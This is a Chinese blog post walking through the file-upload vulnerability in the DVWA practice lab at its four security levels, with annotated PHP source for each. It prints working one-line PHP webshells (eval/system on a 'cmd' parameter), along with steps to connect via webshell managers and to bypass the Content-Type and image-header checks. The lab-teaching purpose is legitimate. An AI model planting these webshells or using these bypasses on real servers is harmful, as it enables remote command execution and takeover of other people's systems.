DVWA--File Upload(文件上传)--四个等级

最新推荐文章于 2024-09-15 22:26:42 发布
最新推荐文章于 2024-09-15 22:26:42 发布
阅读量3k 收藏 23
点赞数 1
分类专栏: DVWA 文章标签: DVWA 文件上传漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41617034/article/details/90048693
版权

这里我们以DVWA的测试环境进行演练(这里利用php的一句话木马进行攻击)

DVWA有四个等级:Low、Medium、High、Impossible
—————————————————————————————————————————————————

Low:

源代码:

<?php 

if( isset( $_POST[ 'Upload' ] ) ) { 

    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 

    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { 
    
        echo '<pre>Your image was not uploaded.</pre>'; 
    } 
    else { 
    
        echo "<pre>{$target_path} succesfully uploaded!</pre>"; 
    } 
} 

?>

代码解释:

<?php 

if( isset( $_POST[ 'Upload' ] ) ) {
//isset判断变量是否存在或为NULL(也就是0,但\0不代表NULL)。变量存在且值不为NULL,返回true;变量存在且值为NULL,返回false;变量存在,直接返回NULL
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    //这里的DVWA_WEB_PAGE_TO_ROOT在xampp/htdocs/dvwa/vulnerabilities/upload/index.php中追溯到define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 
    //basename()函数   返回路径中含有文件扩展名的文件名部分,举例:
/*<?php
$path = "/testweb/home.php";
//显示带有文件扩展名的文件名
echo basename($path);   #答案home.php
//显示不带有文件扩展名的文件名
echo basename($path,".php");   #答案:home
?> 
*/
    //$_FILES["uploaded"]["name"]   返回被上传文件的名称
    //代码完整含义:$target_path = $target_path + basename( $_FILES[ 'uploaded' ][ 'name' ] );
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
/*   if(){
       当括号里为true时执行的代码}
     else{
       当括号里为false时执行的代码}
       
     !代表非
     $_FILES["file"]["tmp_name"]   返回存储在服务器的文件的临时副本的名称
     
     move_uploaded_file()   函数将上传的文件移动到新位置,若成功,则返回true,否则返回false
     在move_uploaded_file()中,如果$_FILES[ 'uploaded' ][ 'tmp_name' ]指定文件是通过post提交,并且文件合法,返回true,否则返回false
     如果move_upoaded_file函数返回true,那么!move_upoaded_file就是false
*/
        echo '<pre>Your image was not uploaded.</pre>'; 
    } 
    else { 
       
        echo "<pre>{$target_path} succesfully uploaded!</pre>"; 
    } 
} 

?>

从以上代码可以看出,代码没有对上传的文件进行任何过滤,甚至还显示出了上传后文件的路径与文件名
这里我们可以利用上传一句话木马(php),再加上中国蚁剑,完成渗透
php一句话木马

<?php @eval($_GET['cmd']); ?>   //适合中国菜刀使用与url渗透
<?php @eval($_POST['cmd']); ?>   //适合中国菜刀与中国蚁剑与hackbar(post)渗透
<?php @eval($_REQUEST['cmd']); ?>   //适合中国菜刀与中国蚁剑与url渗透
//我这了是php7及以上版本,菜刀无论使用三种之一都无法连接,我猜是php版本过高,但如有知道具体原因,还望评论告诉我

eval函数主要执行php代码,也可以执行系统命令
system函数只能执行系统命令
@表示即使报错,也不显示

<?php @system($_GET['cmd']); ?>   //只适合url渗透
<?php @system($_POST['cmd']); ?>   //只适合hackbar(post)渗透
<?php @system($_REQUEST['cmd']); ?>   //只适合url渗透

渗透流程:
1.我们写好包含一句话木马的test.php文件,这里使用的是<?php @eval($_REQUEST['cmd']); ?>
2.点击上传文件,如图:
在这里插入图片描述
3.我们访问上传后的文件
在这里插入图片描述
4.看看能否用url进行命令执行
首先试试能否执行php代码命令:
在这里插入图片描述
在这里插入图片描述
再试试能否执行系统命令:
在这里插入图片描述
在这里插入图片描述
5.我们用中国蚁剑
输入url与密码后,点击添加
在这里插入图片描述
随后双击该数据条
在这里插入图片描述
连接成功,你已经拿下对方服务器的客户端
在这里插入图片描述
—————————————————————————————————————————————————

Medium:

源代码:

<?php 

if( isset( $_POST[ 'Upload' ] ) ) { 

    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 


    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; 
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 


    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && 
        ( $uploaded_size < 100000 ) ) { 


        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { 

            echo '<pre>Your image was not uploaded.</pre>'; 
        } 
        else { 

            echo "<pre>{$target_path} succesfully uploaded!</pre>"; 
        } 
    } 
    else { 

        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 
    } 
} 

?>

代码解释:

<?php 

if( isset( $_POST[ 'Upload' ] ) ) { 

    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 

    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 
    
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; 
    //$_FILES["uploaded"]["type"]   返回被上传文件的类型
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 
    //$_FILES["file"]["size"]   返回被上传文件的大小,以字节计
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && 
        ( $uploaded_size < 100000 ) ) { 
//   ||表示或
//   &&数学中且的意思
//如果$uploaded_type == "image/jpeg"或$uploaded_type == "image/png"并且$uploaded_size < 100000,返回true,继续执行下面的if语句
//否则返回false,执行下面的else语句:echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
//这里就只能上传照片了
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { 
        
            echo '<pre>Your image was not uploaded.</pre>'; 
        } 
        else { 

            echo "<pre>{$target_path} succesfully uploaded!</pre>"; 
        } 
    } 
    else { 

        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 
    } 
} 

?>

由以上Medium级别的代码可以看出,代码对上传文件进行了过滤,只能上传Content-Type为image/jpeg或image/png格式的文件,并且文件必须小于100000字节
但是,它并没有对文件后缀名进行过滤,我们可以通过burpsuite抓包修改Content-Type,从而达到上传后缀名为php的文件
渗透流程:
1.打开burpsuite
2.打开上传页面,在该漏洞等级下上传test.php
在这里插入图片描述
3.将图片中选中的数值改为image/jpeg或image/png,之后Forward,一直放行也可以
在这里插入图片描述
4.你会看到上传成功,如图,说明绕过成功
在这里插入图片描述
5.之后的利用方法和前面Low等级的是一样的
注:因为我这里是最新版的php,00截断无法使用,需要php<5.3.4,后续我会写一篇
—————————————————————————————————————————————————

High:

源代码:

<?php 

if( isset( $_POST[ 'Upload' ] ) ) { 

    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 

    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); 
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ]; 

    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) && 
        getimagesize( $uploaded_tmp ) ) { 
 
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) { 

            echo '<pre>Your image was not uploaded.</pre>'; 
        } 
        else { 

            echo "<pre>{$target_path} succesfully uploaded!</pre>"; 
        } 
    } 
    else { 

        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 
    } 
} 

?>

代码解释:

<?php 

if( isset( $_POST[ 'Upload' ] ) ) { 

    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 

    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
//strrpos( $uploaded_name, '.' ),查找 "." 在字符串中最后一次出现的位置,$uploaded_name的第一个字符位置为0,举例:strrpos(”1.php“ , '.'),结果返回1
//substr()函数,返回字符串的一部分,第一位从0开始,举例:substr("Hello world",6),默认从第6位返回到字符串的结尾,所以返回world
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ]; 

    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) && 
        getimagesize( $uploaded_tmp ) ) { 
//strtolower(文件名)函数,把字符串转换为小写
/*getimagesize()函数,取得图像大小。将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型和一个可以用于普通 HTML 文件中 IMG 标记中的 height/width 文本字符串
如果不能访问$uploaded_tmp指定的图像或者其不是有效的图像,getimagesize()将返回 FALSE 并产生一条 E_WARNING 级的错误
*/
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) { 

            echo '<pre>Your image was not uploaded.</pre>'; 
        } 
        else { 

            echo "<pre>{$target_path} succesfully uploaded!</pre>"; 
        } 
    } 
    else { 

        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 
    } 
} 

?>

从以上代码可以看出,它只允许上传后缀名为jpg/jpeg,并且要求图片小于100000字节
1.我们可以用记事本写一个一句话,然后把后缀名改为jpg格式如图:
在这里插入图片描述
2.尝试上传,出现上传不了,因为后缀名是图片格式还不行,它用了getimagesize函数,所以必须要文件内容也是图片才行
在这里插入图片描述
3.为了达到文件内容也是图片,在文件头部加上jpg格式的GIF89,如图:
在这里插入图片描述
4.再次尝试上传,上传成功
在这里插入图片描述
5.但这个文件是以jpg为后缀,不能用菜刀或蚁剑进行连接,url利用时也只会返回图片信息,并不会执行php命令,所以我们需要让图片进行php解析,这时我们就可以结合DVWA中的文件包含漏洞进行利用:
在这里插入图片描述
在这里插入图片描述
这样就利用成功了
—————————————————————————————————————————————————

Impossible:

源代码:

<?php 

if( isset( $_POST[ 'Upload' ] ) ) { 
    // Check Anti-CSRF token 
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 

    // File information 
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); 
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; 
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ]; 

    // Where are we going to be writing to? 
    $target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/'; 
    //$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-'; 
    $target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext; 
    $temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) ); 
    $temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext; 

    // Is it an image? 
    if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
        ( $uploaded_size < 100000 ) && 
        ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) && 
        getimagesize( $uploaded_tmp ) ) { 

        // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD) 
        if( $uploaded_type == 'image/jpeg' ) { 
            $img = imagecreatefromjpeg( $uploaded_tmp ); 
            imagejpeg( $img, $temp_file, 100); 
        } 
        else { 
            $img = imagecreatefrompng( $uploaded_tmp ); 
            imagepng( $img, $temp_file, 9); 
        } 
        imagedestroy( $img ); 

 
        if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) { 

            echo "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>"; 
        } 
        else { 

            echo '<pre>Your image was not uploaded.</pre>'; 
        } 

 
        if( file_exists( $temp_file ) ) 
            unlink( $temp_file ); 
    } 
    else { 

        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 
    } 
} 

// Generate Anti-CSRF token 
generateSessionToken(); 

?>

代码解释:

<?php 

if( isset( $_POST[ 'Upload' ] ) ) { 
    // Check Anti-CSRF token 
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 

    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); 
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; 
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ]; 
 
    $target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/'; 
    //$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-'; 
    $target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext; 
    //md5()函数,计算字符串的MD5散列,也就是给字符串进行md5加密
    //uniqid()函数,基于以微秒计的当前时间,生成一个唯一的ID
    $temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) ); 
    /*
    ini_get   获取一个配置选项的值
    ini_get ( string $varname )   成功时返回配置选项的值

    varname   配置选项名称
    成功是返回配置选项值的字符串,null 的值则返回空字符串。如果配置选项不存在,将会返回 FALSE
    */
    
    //php.ini中的upload_tmp_dir的这个参数为上传文件的临时目录
    
    /*
    ?是条件语句的简写
    举例:
    if($x>3){
    echo "OK";}
    else{
    echo "NO";}
    等同于$x>0 ? echo "OK" : echo "NO";
    三元运算符语法:条件 ? 符合条件结果1 : 不符合条件结果2
    */
    
    /*
    sys_get_temp_dir — 返回用于临时文件的目录
    sys_get_temp_dir ( void )
    返回 PHP 储存临时文件的默认目录的路径,就是返回临时目录的路径
    */
    $temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext; 

    if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
        ( $uploaded_size < 100000 ) && 
        ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) && 
        getimagesize( $uploaded_tmp ) ) { 

        // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD) 
        if( $uploaded_type == 'image/jpeg' ) { 
            $img = imagecreatefromjpeg( $uploaded_tmp ); 
            //imagecreatefromjpeg ($filename )   返回一图像标识符,代表了从给定的文件名取得的图像
            imagejpeg( $img, $temp_file, 100); 
            //imagejpeg ( resource $image [, string $filename [, int $quality ]] )
            //imagejpeg() 从 image 图像以 filename 为文件名创建一个 JPEG 图像,参数quality可选,0-100 (质量从小到大)
        } 
        else { 
            $img = imagecreatefrompng( $uploaded_tmp ); 
            //imagecreatefrompng ($filename )   返回一图像标识符,代表了从给定的文件名取得的图像
            imagepng( $img, $temp_file, 9); 
            //imagepng ( resource $image [, string $filename ] )
            //imagepng() 将 GD 图像流(image)以 PNG 格式输出到标准输出(通常为浏览器),或者如果用 filename 给出了文件名则将其输出到该文件
        } 
        imagedestroy( $img ); 
        //imagedestroy ( resource $image )
        //magedestroy() 释放与 image 关联的内存。image 是由图像创建函数返回的图像标识符

 
        if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) { 
        //rename(oldname,newname,context)
        
        /*oldname	必需。规定要重命名的文件或目录。
          newname	必需。规定文件或目录的新名称。
          context	可选。规定文件句柄的环境。context 是可修改流的行为的一套选项*/
          
        //rename() 函数重命名文件或目录
        
        //getchwd() 函数返回当前工作目录
        
        /*举例:
         <?php echo getcwd() ?>
          结果:
          /home/php
          */
        /*
        DIRECTORY_SEPARATOR  php目录分隔符
        因为windows下的分隔符为\,但在Linux下却为/,Windows下的\是无法在Linux下运行的,所以用DIRECTORY_SEPARATOR(php内置变量),自动辨别使用哪种分隔符,这样就不会出错了      
        */
            echo "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>"; 
        } 
        else { 

            echo '<pre>Your image was not uploaded.</pre>'; 
        } 

 
        if( file_exists( $temp_file ) ) 
        /*
        file_exists() 函数检查文件或目录是否存在
        如果指定的文件或目录存在则返回 true,否则返回 false
        
        file_exists(path)
        path	必需。规定要检查的路径
        
        举例:
       <?php echo file_exists("test.txt"); ?>
       输出:
        1
        */
            unlink( $temp_file ); 
            /*
            unlink() 函数删除文件
            若成功,则返回 true,失败则返回 false

            unlink(filename,context)
            filename	必需。规定要删除的文件。
            context	可选。规定文件句柄的环境。Context 是可修改流的行为的一套选项
            */
    } 
    else { 

        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 
    } 
} 

// Generate Anti-CSRF token 
generateSessionToken(); 

?>

上面的impossible源代码也就是无上传漏洞可利用

1stPeak
关注
专栏目录
4.File Upload(High)——小白笔记——DVWA
qwsn
11-16 1745
0x01:High级别的DVWA测试 1.上源码 File Upload Source: <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; ...
DVWA系列---File Upload 文件上传漏洞
野原新之助
01-27 544
文章目录一、前言二、Low级别1、演示三、Medium级别四、High级别 一、前言 文件上传漏洞是指: 服务器对用户上传的文件没有进行严格过滤,导致用户上传了一些危险文件(如一句话木马的php文件),然后访问这些危险文件,对服务器造成控制或破坏。 预防方法: 1、对用户可上传的文件类型及进行严格控制,设置白名单,防止用户上传危险文件; 2、对上传的文件进行文件名转换,防止用户直接访问到上传的文件...
DVWA文件上传File Upload)四级别分析
liweibin812的博客
01-15 5700
本文转自:https://www.freebuf.com/articles/web/119467.html File Upload File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。 ...
DVWA】——File Upload文件上传
最新发布
HinsCoder的博客
09-15 626
文件上传漏洞是由于对上传文件未作过滤或过滤机制不严(文件后缀或类型),导致恶意用户可以上传脚本文件,通过上传文件可达到控制网站权限的目的。
DVWA--Brute Force(暴力破解)--四个等级
1stPeak's Blog
10-29 3621
DVWA的Brute Force,也就是我们所熟悉的暴力破解,这里它一共有四个等级 索引目录: Low Medium High Impossible Low 源代码: <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'userna...
DVWA File Upload文件上传)全等级
柠檬i的博客
12-19 1946
File Upload文件上传) 目录:File Upload文件上传)一句话木马的构成1. Low1.上传一句话木马1.php2.中国蚁剑2.Medium3. High4.Impossible 一句话木马的构成 常见的一句话木马: <?php @eval($_POST['shell']); ?> 最外层的是 <?php和?> 这是php文件的起始和结束标记, php会解析执行 <?php ?>里面的代码。 然后是eval函数,eval()函数把字符串按照 PHP
DVWAFile Upload文件上传
RexHa的博客
10-02 2805
文件上传原理: 黑客利用文件上传后服务器解析处理文件的漏洞上传一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。
DVWA】--- 五、文件上传(File Upload)
qq_43168364的博客
05-31 318
File Upload 目录 一、Low级别 二、Medium级别 方法一 方法二 三、high级别 方法一 方法二 <>一、Low级别 代码审计 相关函数 basename() 函数:返回路径中的文件名部分。 move_uploaded_file(file,newloc):将上传的文件移动到新位置,file—要移动的文件,newloc—新的位置。 用户可以上传任意类型的文件,这里上传一句话木马进行连接 上传成功回显出了路径 连接,得到控制权 二、Me
DVWA 实验报告:5、文件上传 File Upload
看那白熊
05-16 1668
dvwa 文件上传漏洞复现
Kali渗透测试之DVWA系列10——File Upload(文件上传)
浅浅的博客
06-14 5984
一、File Upload文件上传) 1、文件上传原理 File Upload,即文件上传漏洞。通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。简单点说,就是用户直接或者通过各绕过方式将 webshell 上传到服务器中进而执行利用。 2、文件上传漏洞前提条件...
DVWA & File Upload文件上传最详细绕过
热门推荐
Hackpatrick的博客
08-04 2万+
DVWA的使用练习: 今天学习的内容很有意思,也很实用。 DVWA其实本质上就是一个脆弱系统,它需要的是php+mysql的环境,旨在为安全人员提供一个合法的环境用来测试自己的专业技能和工具,并且让web安全工作着深刻的理解漏洞防范和入侵的本质原理,很适合我们这小白锻炼自己,好废话不多说。。。。。 首先DVWA环境安装: 在下载DVWA之前我们需要一个php+mysql的环境,apach...
DVWA文件上传_全级别
weixin_45378289的博客
07-02 349
1.low级别 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // Can we move the file
DVWA upload
weixin_45694388的博客
11-29 124
LOW medium high impossible
DVWA--Command Injection(命令执行)--四个等级
1stPeak's Blog
10-29 4087
Command Injection,也就是我们常说的命令执行,DVWA共有四个等级 索引目录 Low Medium High Impossible Low 源代码: <?php if( isset( $_POST[ 'Submit' ] ) ) { // Check Anti-CSRF token checkTok...
DVWA靶机-XSS与CSRF、文件上传的攻击原理、分类、对比以及漏洞演示(low、Medium、Hign、Impossible)
天下著书立传者,皆为我师
03-16 2332
DVWA靶机--讲解XSS与CSRF、文件上传的攻击原理、分类、对比以及漏洞演示(low、Medium、Hign、Impossible)
DVWA--upload
weixin_30385925的博客
05-21 247
文件上传漏洞 0x01了解文件上传漏洞的用处是用来干什么的 什么是文件上传漏洞文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件...
DVWA-File upload
yangbz123的博客
06-15 173
Low级别 源代码如下 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // Can we move
DVWA文件上传漏洞(medium)
cried_cat的博客
04-06 1934
DVWA文件上传漏洞2018/4/6        criedcat ***本文需要知道%00截断是怎么个一回事。整体上的思路无非就是上传一个隐藏的木马,然后用菜刀链接*** ****网络有文章说,%00截断出现在php5.3.4之前版本,但是我的测试环境是5.4.45,却依然可以用%00截断;笔者不知道是否和服务器有什么关系***** 首先介绍一下,dvwa是我们平常很熟悉的一个php漏洞集成平...
DVWA-文件上传File Upload
weixin_58954236的博客
08-20 858
指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
dvwa-master zip
07-28
dvwa-master zip是一个开源的漏洞脆弱性应用程序,用于进行网络安全测试和漏洞扫描。 具体而言,dvwa-master zip是一个基于PHP和MySQL开发的靶场平台,旨在帮助用户了解和学习网络安全漏洞。它模拟了多常见的Web...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值